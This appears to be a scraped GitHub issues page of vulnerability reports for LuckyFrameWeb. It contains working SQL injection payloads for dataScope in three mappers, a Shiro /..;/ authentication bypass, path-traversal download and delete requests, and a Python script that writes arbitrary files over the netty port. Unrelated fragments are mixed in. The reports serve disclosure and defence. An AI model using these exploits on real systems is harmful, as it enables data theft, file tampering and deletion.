seagull1985 / luckyframeweb Goto Github PK

src/main/resources/mybatis/system/RoleMapper.xml

There is a ${} in this mapper

<if test="deptId != null and deptId != 0">
			AND (u.dept_id = #{deptId} OR u.dept_id IN ( SELECT t.dept_id FROM sys_dept t WHERE FIND_IN_SET (#{deptId},ancestors) ))
		</if>
		<!-- 数据范围过滤 -->
		${params.dataScope}
	</select>
	

Search selectUserList to see where the this select id is used：

Query user information：
src/main/java/com/luckyframe/project/system/role/controller/RoleController.java

Follow up the selectUserList method to see the specific implementation：

src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java

The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

Verification:

Splice URL and parameters according to code:

params[dataScope]=

Use error injection to query the database version：

params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

Select database name:

The shiro version used by LuckyFrameWeb is 1.5.0. The shiro configuration has bypass rules

com.luckyframe.framework.config.ShiroConfig#shiroFilterFactoryBean

Normal access, response status 302

Use /..;/ to bypass

https://github.com/intuit/karate

Karate is the only open-source tool to combine API test-automation, mocks and performance-testing into a single, unified framework. The BDD syntax popularized by Cucumber is language-neutral, and easy for even non-programmers. Besides powerful JSON & XML assertions, you can run tests in parallel for speed - which is critical for HTTP API testing.

API: common/download, parameter: fileName is not verified, resulting in arbitrary file download

com.luckyframe.project.common.CommonController#fileDownload

Use authentication bypass vulnerability to read pom.xml file

GET /css/..;/common/download?fileName=../../pom.xml HTTP/1.1

The server uses netty to start the server, and then processes messages in ServerHandler#channelRead

Use fastjson to parse json data, and distinguish different request methods through CLIENT_METHOD("method") in the data

com.luckyframe.common.netty.ServerHandler#channelRead

When processing the upload request method, the IMG_NAME("imgName") in the data body was directly obtained for splicing, resulting in an arbitrary file writing vulnerability

com.luckyframe.common.netty.ServerHandler#channelRead

The important fields are that imgName is the destination filename on the server

The content of the file is controlled by fileUploadFile where bytes is the encoded data of base64, starPos, endPos are the start position and end position respectively

{
    "imgName":"file",
    "method":"upload",
    "data":{
        "code":1,
        "fileUploadFile":{
            "bytes":"YWJjZGVmZ2hpag==",
            "endPos":10,
            "file":"",
            "starPos":0
        },
        "message":"test",
        "uniId":"2131231"
    },
    "start":0,
    "uuid":"1231231"
}

Scripting with Python

import socket
import base64

dst_filename = "../upload.xxx"
file_content = "Upload Success!!!!"
b64_file_content = base64.b64encode(file_content.encode()).decode()
content_length = len(file_content)

upload_data = str({
    "imgName": dst_filename,
    "method": "upload",
    "data": {
        "code": 1,
        "fileUploadFile": {
            "bytes": b64_file_content,
            "endPos": content_length,
            "file": "",
            "starPos": 0
        },
        "message": "test",
        "uniId": "2131231"
    },
    "start": 0,
    "uuid": "1231231"
})

register_client_data = str({
    "hostName": "172.22.96.22", "method": "clientUp",
    "clientName": "", "ip": "172.22.96.22", "version": "3.5"
})

client = socket.socket()
client.connect(("192.168.157.1", 7070))
client.send(f'{register_client_data}$_'.encode())
print(client.recv(4096))
client.send(f"{upload_data}$_".encode())
print(client.recv(65535))
client.close()

uploaded successfully

file read: use ..\ to bypass SecurityFilter
GET /common/download?fileName=%2e%2e%5c%2e%2e%5c%70%6f%6d%2e%78%6d%6c&delete=false HTTP/1.1
Host: 192.168.120.133:8087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_ecc8b50a3122e6d5e09be7a9e5383e07=1705915229; JSESSIONID=43152667-9015-4f85-9d5a-5cb37bb9f9c0
Connection: close
Upgrade-Insecure-Requests: 1

file delete: set delete to true
GET /common/download?fileName=%2e%2e%5c%2e%2e%5c%70%6f%6d%2e%78%6d%6c&delete=true HTTP/1.1
Host: 192.168.120.133:8087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_ecc8b50a3122e6d5e09be7a9e5383e07=1705915229; JSESSIONID=43152667-9015-4f85-9d5a-5cb37bb9f9c0
Connection: close
Upgrade-Insecure-Requests: 1

Ordinary users can access non-privileged interfaces. lead to information leakage,

Interface with information leakage ：
/testmanagmt/projectCase/list
/testmanagmt/projectCase/edit
/testmanagmt/projectCase/copy
/testmanagmt/projectCaseSteps/edit
/testmanagmt/projectCaseDebug/projectCaseDebug/
/testmanagmt/projectCase/export
/testmanagmt/projectCaseModule/list
/testmanagmt/projectProtocolTemplate
/testmanagmt/projectPlan/list
/testmanagmt/projectCaseParams/list
/testexecution/taskScheduling/list
/testexecution/taskExecute/list
/testexecution/taskCaseExecute/list
/qualitymanagmt/qaVersion/list
/qualitymanagmt/qaAccident/list

src/main/resources/mybatis/system/UserMapper.xml

There is a ${} in this mapper

Search selectUserList to see where the this select id is used：

UserController.java

Query user information：

Follow up the selectUserList method to see the specific implementation：

UserServiceImpl.java

The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

Verification:

Splice URL and parameters according to code:

params[dataScope]=

Use error injection to query the database version：

params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

Select database name:

服务器部署在公网环境，客户端部署在内网环境，此时客户端ip为内网ip，服务端ip为公网ip。当客户端提交注册是，服务端下发消息无法发送到客户端。

src/main/resources/mybatis/system/DeptMapper.xml

There is a ${} in this mapper

Search selectDeptList to see where the this select id is used:

/DeptController.java

Query dept information：

Follow up the selectDeptList method to see the specific implementation：

/DeptServiceImpl.java

The parameters in the Dept are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

Verification:

Splice URL and parameters according to code:

params[dataScope]=

Use error injection to query the database version：

params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

Select database name: